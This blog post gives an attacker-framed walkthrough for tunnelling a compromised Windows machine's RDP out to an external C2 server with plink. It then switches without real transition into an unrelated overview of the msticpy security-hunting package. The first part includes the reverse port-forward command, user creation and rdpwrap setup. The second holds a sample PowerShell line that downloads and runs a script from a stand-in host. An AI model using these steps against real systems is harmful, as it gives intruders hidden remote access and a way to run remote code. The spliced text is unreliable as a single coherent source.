Wednesday, June 19, 2019

How to access RDP over SSH tunnel



Remote Desktop Protocol (RDP) provides a convenient graphical connection to a remote computer. But it is just as useful to an attacker who has compromised such a computer. Companies usually protect non-exposed systems from inbound RDP attempts with firewall and NAT rules, but attackers know this and have found other ways to get through, such as network tunneling and host-based port forwarding.
In this blog post I will show how to run RDP over an SSH tunnel with plink, but first, let's understand what it means to create a tunnel.

Network tunneling and port forwarding

Tunneling, also known as “port forwarding”, is the transmission of data intended for use only within a private network through a public network. It allows us to move traffic from one network to another by encapsulating the private network's communications inside packets sent over the public network.
It is reminiscent of a VPN, because VPNs are built on the idea of tunneling, but the two are different from each other.

General overview for such attack

Let’s say our attacker has managed to get a foothold on one computer (the victim’s computer) in the internal network. The attacker will enable RDP on the machine and dump a user’s credentials, or create a new user and add it to a group with permission for RDP connections.
The attacker has an external SSH server (a Linux machine) and creates a remote port forwarding from the victim’s computer: a generic port (“12345”) on the Linux machine is forwarded to 127.0.0.1:3389 on the victim.
Once the connection has been established, the attacker connects with RDP from anywhere to the Linux machine on port “12345”, and the traffic is forwarded to 127.0.0.1:3389 on the victim’s machine.
Now that we understand the general picture, let’s start the work.
We will need a Linux machine to act as the C2 server, a Windows 10 machine as the victim’s computer, and another Windows system to connect with RDP to the Linux machine.
*If this is too much for you, the Linux machine can be replaced by an SSH server application for Windows such as FreeSSHD or Bitvise, but I found that a Linux machine works more smoothly.

Stage 1: Setting up Linux server for SSH

Run systemctl status ssh and make sure the SSH server is running:
SSH service is running
If it isn’t running, install and enable the OpenSSH server:
sudo apt update
sudo apt install openssh-server
One of our goals is to open a generic listening port (“12345”) on the Linux machine that accepts connections from anywhere.
To make that possible, we need to make one more small change.
Edit the file /etc/ssh/sshd_config and add the following line:
GatewayPorts=clientspecified
This line allows remote hosts to connect to ports forwarded for the client.
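After saving the change, restart the SSH service so it takes effect. A minimal sketch, assuming a Debian/Ubuntu system where the service is named ssh:
sudo sshd -t
sudo systemctl restart ssh
The first command only checks that the configuration file is valid; the second applies the change.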
Our Linux server is ready with SSH enabled.

Stage 2: Enable RDP on the remote computer

There are many ways to enable RDP. I will show the straightforward way with the GUI, but don’t expect an attacker to do it this way :).
Open System Properties by opening the Run window (winkey + “R”), typing sysdm.cpl, pressing Enter and going to the Remote tab. Or, to get there faster, just type SystemPropertiesRemote in the Run window and press Enter.
Make sure Allow remote connections to this computer is checked:
Go to “Select Users…” and add any user you want. This grants that user remote desktop permissions.
In our case, we added a local user named “remote1”:
Now that RDP is enabled, there is another optional step that enables multi-session RDP connections. This allows us to connect with RDP to the remote computer without interfering with the currently connected user.
In our case we used rdpwrap, an open source library that makes this possible. We download it:
After running the installation, we run RDPConf to make sure that it is working:
If you are doing this in a lab, make sure that you are able to connect to the computer with RDP before starting the tunnel.

Stage 3: Creating the tunnel

A common utility used to tunnel RDP sessions is PuTTY Link, known as Plink. It can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. With this tool we can create an encrypted tunnel that carries the RDP traffic back to the Linux machine, the attacker’s command and control (C2) server.
An example of using it:
plink.exe <user>@<ip or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 0.0.0.0:12345:127.0.0.1:3389
  • -P - connect to a specific port (“22”, SSH in our case)
  • -2 - force use of protocol version 2
  • -4 - force use of IPv4
  • -T - disable pty allocation
  • -N - don’t start a shell/command (SSH-2 only)
  • -C - enable compression
  • -R - forward a remote port to a local address. In our case, connections to port 12345 on the Linux machine will be forwarded to 127.0.0.1:3389
Important:
  • The user is the user for the SSH connection, not for RDP!
  • The IP is for the SSH server (Linux machine)
Notice that in our case we are doing remote port forwarding; there are two more kinds of port forwarding, local and dynamic, but I won’t go into the differences in this post.
On the victim’s system it will look like this:
We are using the user “newton” and its password to connect to SSH on the Linux machine.
To check that the port is open, we go to our Linux machine and run
netstat -ano | grep LIST
We can see that the port “12345” is open from anywhere (“0.0.0.0”):
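As an aside, if plink is not available, recent Windows 10 builds ship an OpenSSH client that can create the same tunnel. A minimal sketch, using the same SSH user “newton” and a placeholder for the server address:
ssh -N -R 0.0.0.0:12345:127.0.0.1:3389 newton@<linux-machine-ip>
The -N and -R options have the same meaning as Plink’s -N and -R above.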

Stage 4: Connecting to the tunnel

Everything is ready. We take any Windows computer and connect with RDP to the Linux machine’s IP and port “12345”:
The connection is received by the Linux SSH server and redirected to 127.0.0.1:3389 on the victim’s computer.
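For example, from a command prompt the built-in Remote Desktop client can be pointed at the forwarded port (the server address is a placeholder):
mstsc /v:<linux-machine-ip>:12345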

Analysis

If we sniff the network on the victim’s computer, we will see encrypted SSH communication and no hint of RDP:
On the victim’s computer, the Event Viewer shows event 4624 with logon type 10, indicating that a remote desktop connection to the computer occurred from 127.0.0.1:
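To pull these events quickly in a lab, one option is a PowerShell query against the Security log (a minimal sketch; the logon type and source address still have to be inspected in each event’s details):
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} -MaxEvents 50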

Tools like msticpy, covered next, are useful for this kind of cyber crime investigation.


msticpy is a package of python tools intended to be used for security investigations and hunting (primarily in Jupyter notebooks). Most of the tools originated from code written in Jupyter notebooks that was tidied up and re-packaged into python modules. I’ve added some references to other blogs in the References section, where I describe some of these notebooks in more detail.

The goals of the package are twofold:
  1. Reduce the clutter of code in notebooks making them easier to use and read.
  2. Provide building-blocks for future notebooks to make authoring them simpler and quicker.
There are some side benefits from this:
  • The functions and classes are easier to test when extracted into standalone modules, so (hopefully) they are more robust.
  • The code is easier to document, and the functionality is more discoverable than having to wade through old notebooks and copy and paste the desired functions.
While much of the functionality is only useful in Jupyter notebooks (e.g. much of the nbtools sub-package), there are several modules that are usable in any python application - most of the modules in the sectools sub-package fall into this category.

msticpy is organized into three main sub-packages:
  • sectools - python security tools to help with data analysis or investigation. These are all focused on data transformation, data analysis or data enrichment.
  • nbtools - Jupyter-specific UI tools such as widgets and data display. These are mostly presentation-layer tools concentrating on how to view or interact with the data.
  • data - data interfaces and query library for log and alert APIs including Azure Sentinel/Log Analytics, Microsoft Graph Security API and Microsoft Defender Advanced Threat Protection (MDATP).
The package is still in an early preview mode so there are likely to be bugs, possible API changes and much is not yet optimized for performance. We welcome feedback, bug reports and suggestions for new or improved features as well as contributions directly to the package.

In this article I'll give a brief overview of the main components. This is intended as an overview of some of the features rather than a full user guide. Although the modules/functions/classes are documented at the API level, we are still missing more detailed user guidance. In future blogs I will drill down into some of the specific components to describe their use (and limitations) in more detail, which will help fill some of this gap. Some of the modules have user documentation notebooks, which are listed in the References section at the end of the document. The API documentation is available on msticpy ReadTheDocs.

Request for Comments


We would really appreciate suggestions for future or better features. You can add these in comments to this doc or directly as issues on the msticpy GitHub.

Installing


The package requires Python 3.6 or later (see Supported Platforms for more details).
pip install msticpy
or, for the latest dev build, install from the GitHub repo (although we usually publish directly to PyPI)
A conda recipe and package is in the works but not yet available.
Installing the package will also install dependencies if the required versions are not already present. If you are installing into an environment where you already use some of these dependencies (especially if you are using conflicting versions), you should create a python or conda virtual environment and use your notebooks from within that.
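For example, a minimal sketch of creating an isolated environment on Linux before installing (the environment name is arbitrary):
python3 -m venv msticpy-env
source msticpy-env/bin/activate
pip install msticpy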

Security Tools Sub-package - sectools


This sub-package contains several modules helpful for working on security investigations and hunting. These are mostly data-processing modules and classes, and they are usually not restricted to use in a Jupyter/IPython environment (although some of the modules have a visualization component that may not work outside a notebook).

base64unpack
This is a Base64 and archive (gz, zip, tar) extractor intended to help decode obfuscated attack command lines and http request strings. Input can either be a single string or a specified column of a pandas dataframe. The module will try to identify any base64 encoded strings and decode them. If the result of a decoding looks like one of the supported archive types, it will try to unpack the contents. The results of each decode/unpack are rechecked for further base64 content, recursing down up to 20 levels (the default can be overridden, but if you need more than 20 levels, there is probably something wrong!). Output is a decoded string (for single string input) or a DataFrame (for dataframe input).
Base64unpack.png
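The module itself does the heavy lifting, but the core idea can be illustrated with a short conceptual sketch in plain Python (this is not the msticpy API, just the decode-and-recheck recursion described above):

import base64
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")  # crude base64 candidate matcher

def decode_recursive(text, depth=0, max_depth=20):
    """Decode base64 candidates in text, re-checking the results up to max_depth levels."""
    if depth >= max_depth:
        return text
    for candidate in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(candidate).decode("utf-8", errors="ignore")
        except ValueError:
            continue
        # replace the encoded blob with its decoded (and possibly further decoded) content
        text = text.replace(candidate, decode_recursive(decoded, depth + 1, max_depth))
    return text

print(decode_recursive("powershell -enc aGVsbG8gd29ybGQ="))  # -> powershell -enc hello world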

iocextract
This uses a set of built-in regular expressions to look for Indicator of Compromise (IoC) patterns. Input can be a single string or a pandas dataframe with one or more columns specified as input. You can add additional patterns and override built-in patterns.
The following types are built-in: IPv4 and IPv6, URLs, DNS domains, Hashes (MD5, SHA1, SHA256), Windows file paths and Linux file paths (this latter regex is kind of noisy because a legal linux file path can have almost any character). The two path regexes are not run by default.

Output is a dictionary of matches (for single string input) or a DataFrame (for dataframe input).
ioc_extract.png
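As a rough sketch of how this looks in a notebook (the class and method names below are recalled from the msticpy docs and should be treated as an assumption to verify against the current API):

from msticpy.sectools.iocextract import IoCExtract

# NOTE: names are assumed from the docs; check the API reference before relying on them.
ioc_extractor = IoCExtract()
cmdline = "powershell IEX (New-Object Net.WebClient).DownloadString('http://badhost.example/a.ps1')"
iocs_found = ioc_extractor.extract(cmdline)   # dict-like mapping of IoC type -> set of matches
print(iocs_found)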

vtlookup
A wrapper class around the VirusTotal API. Input can be a single IoC observable or a pandas DataFrame containing multiple observables. Processing requires a VirusTotal account and API key, and throughput is limited to the number of requests per minute allowed for your account type. For example, a VirusTotal free account is limited to 4 requests per minute. Supported IoC types are: file hash (MD5, SHA1, SHA256), URL, DNS domain and IPv4 address.
vt_lookup.png
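Independently of the wrapper, the underlying lookup is a plain HTTP request to the VirusTotal v2 API; a minimal sketch, where the API key is a placeholder and the hash is the well-known EICAR test file MD5:

import requests

VT_URL = "https://www.virustotal.com/vtapi/v2/file/report"
params = {
    "apikey": "<your-vt-api-key>",                   # placeholder
    "resource": "44d88612fea8a8f36de82e1278abb02f",  # EICAR test file MD5
}
resp = requests.get(VT_URL, params=params)
print(resp.json().get("positives"), "engines flagged this hash")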

geoip
Geographic location lookup for IP addresses is implemented as a generic class with support for different data providers. The shipped module has two data providers: Maxmind GeoLite2 and IPStack.
Both services offer a free tier for non-commercial use, while a paid tier will normally get you more accuracy, more detail and a higher throughput rate. Maxmind GeoLite2 uses a downloadable database, while IPStack is an online lookup (an account and API key are required).

The following screenshot shows both the use of the GeoIP lookup classes and a map display from another msticpy module using folium (a python package based on leaflet.js)
geo_ip.png
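Usage in a notebook is typically just a couple of lines; the class and method names in this sketch are recalled from the msticpy docs and should be treated as an assumption to verify:

from msticpy.sectools.geoip import GeoLiteLookup

# NOTE: names are assumed from the docs; check the API reference before relying on them.
iplocation = GeoLiteLookup()
raw_results, ip_entities = iplocation.lookup_ip(ip_address="8.8.8.8")
print(ip_entities)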

eventcluster
This module is intended to be used to summarize large numbers of events into clusters of different patterns. High volume repeating events can often make it difficult to see unique and interesting items.
The module contains functions to generate clusterable features from string data. For example, consider an administration command that does some maintenance on thousands of servers with a command line such as:
install-update -hostname {host.fqdn} -tmp:/tmp/{some_GUID}/rollback
These repetitions can be collapsed into a single cluster pattern by ignoring the character values in the string and using delimiters or tokens to group the values.
This module uses an unsupervised learning model implemented with scikit-learn DBSCAN.
event_cluster.png
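The msticpy module builds much richer features, but the underlying technique can be sketched directly with scikit-learn's DBSCAN on a couple of trivial command-line features (a conceptual illustration, not the eventcluster API):

import numpy as np
from sklearn.cluster import DBSCAN
from sklearn.preprocessing import StandardScaler

cmdlines = [
    "install-update -hostname web01 -tmp:/tmp/a1b2/rollback",
    "install-update -hostname web02 -tmp:/tmp/c3d4/rollback",
    "install-update -hostname db01 -tmp:/tmp/e5f6/rollback",
    "powershell -enc aGVsbG8gd29ybGQ=",
]

# trivially simple clusterable features: string length and token count
features = np.array([[len(c), len(c.split())] for c in cmdlines], dtype=float)
labels = DBSCAN(eps=0.5, min_samples=2).fit_predict(StandardScaler().fit_transform(features))

for cmd, label in zip(cmdlines, labels):
    print(label, cmd)   # the three install-update lines share a cluster; the odd one is noise (-1)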

outliers
Similar to the eventcluster module but a little more experimental (read 'less tested'). It uses scikit-learn's Isolation Forest to identify outlier events, either within a single data set or by training on one data set and predicting outliers in another.
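Again as a conceptual illustration rather than the module's own API, the same kind of features can be fed to scikit-learn's IsolationForest, fitting on one data set and predicting on another:

from sklearn.ensemble import IsolationForest

train = [[54, 4], [54, 4], [53, 4], [55, 4], [52, 4]]   # "normal" feature vectors
new_events = [[54, 4], [400, 60]]                       # one familiar, one unusual

clf = IsolationForest(contamination=0.1, random_state=42).fit(train)
print(clf.predict(new_events))   # 1 = inlier, -1 = outlier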

auditdextract
Module to load and decode Linux audit logs. It collapses messages sharing the same message ID into single events, decodes hex-encoded data fields and performs some event-specific formatting and normalization (e.g. for process start events it will re-assemble the process command line arguments into a single string).

The following figures show examples of raw audit messages and converted messages (these are two different event sets, so they don’t show the same messages).
auditd_raw.png

auditd_processed.png


Notebook tools sub-package - nbtools


This is a collection of display and utility modules designed to make working with security data in Jupyter notebooks quicker and easier.
  • nbwidgets - groups common functionality such as list pickers, time boundary settings, and saving and retrieving environment variables into single-line callable commands. In most cases these are simple wrappers around, and collections of, the standard IPyWidgets.
  • nbdisplay - functions that display things like alerts and events in a slightly prettier and more consumable way than print().

 

nbwidgets


Query time selector

query_time_widget.png
Session browser

session_browser.png

Alert browser
alert_selector.png

nbdisplay


Event timeline

event_timeline.png

Logon display

logon_display.png

Process Tree

process_tree.png

Data sub-package - data


Some of these components are currently part of the nbtools sub-package but will be migrated to the data sub-package.

Parameterized query manager

This is a collection of modules that includes a set of commonly used queries and can be supplemented by user-defined queries supplied in yaml files. The purpose of these is to give you quick access to commonly used queries in a way that allows easy substitution of parameter values such as date range, host name, account name, etc. The package currently supports Kusto Query Language (KQL) queries targeted at Log Analytics and OData queries targeted at the Microsoft Graph Security API. We are building driver modules to work with the Microsoft Defender Advanced Threat Protection API and, in principle, this could be extended to cover any query expressed as a simple string. The architecture and yaml format were inspired by the Intake package, although some of the parameter substitution gymnastics meant that I was not able to use that package directly.
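The mechanics of parameter substitution can be sketched conceptually (this is not the msticpy yaml format, just an illustration of a KQL query template with substitutable parameters):

# a KQL query template with named parameters, and the values to fill in
HOST_LOGONS_QUERY = """
SecurityEvent
| where EventID == 4624
| where Computer has '{host_name}'
| where TimeGenerated between (datetime({start}) .. datetime({end}))
"""

params = {"host_name": "victim-pc", "start": "2019-06-01", "end": "2019-06-19"}
print(HOST_LOGONS_QUERY.format(**params))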

Sample query definition

yaml_query_definition.png

Query provider setup

query_provider_setup.png

Running a query

running_query.png

Note: the parameters for the query are auto-extracted from the query_times date widget object.

Other Modules


security_alert and security_event
These are encapsulation classes for alerts and events. Each has a standard 'entities' property reflecting the entities found in the alert or event. These can also be used as meta-parameters for many of the queries. For example, the query:
qry.list_host_logons(query_times, alert)
will extract the value for the hostname query parameter from the alert.

entityschema
This module implements entity classes (e.g. Host, Account, IPAddress, etc.) used in Log Analytics alerts and in many of these modules. Each entity encapsulates one or more properties related to the entity. This example shows a Linux alert with the related entities.
entity_view.png

To-Do Items


Some of the items on our to-do list are shown below. However, other things requested by popular demand or contributed by others can certainly change this.
  • Create generic Threat Intel lookup interface supporting multiple providers.
  • Add additional modules for host-to-ip and ip-to-host resolution.
  • Add syslog queries, processing and visualizations.
  • Add network queries, processing and visualizations.
  • Add additional notebooks to document use of the tools.

Supported Platforms and Packages


  • msticpy is OS-independent
  • Requires Python 3.6 or later
  • Requires the following python packages: pandas, bokeh, matplotlib, seaborn, setuptools, urllib3, ipywidgets, numpy, attrs, requests, networkx, ipython, scikit_learn, typing
  • The following packages are recommended and needed for some specific functionality: Kqlmagic, maxminddb_geolite2, folium, dnspython, ipwhois

Contributing to msticpy


msticpy is intentionally an open source package so that it is available to be used as-is or in modified form by anyone who wants to. We also welcome contributions – whether these are whole features, extensions of existing features, bug-fixes or additional documentation.

I’m a little finicky about code hygiene so I would (politely) ask the following for potential contributors:
  • Include doc comments in all modules, classes, public functions and public methods. Please use numpy docstring standard for consistency and to allow our auto-documentation to work well.
  • We are converting to Black code formatting throughout the project. This will happen whether you format your code like this or not. 😊
  • Type annotations are a great thing. History and I will thank you for adding type annotations. See this section of the docs for more information.
  • We write unit tests using the Python unittest format but run them with pytest. Please add unit tests for any substantial PRs, and please make sure that the existing unit tests complete successfully.
  • Linters and other stuff. Committed branches will kick off tests and linting in the Azure build pipeline. Many of these are non-breaking (i.e. your build will complete with warnings) but please try to avoid introducing any new warnings (I’m having a hard enough time fixing my own!). Using pylint, prospector, mypy and pydocstyle is a good minimum combination.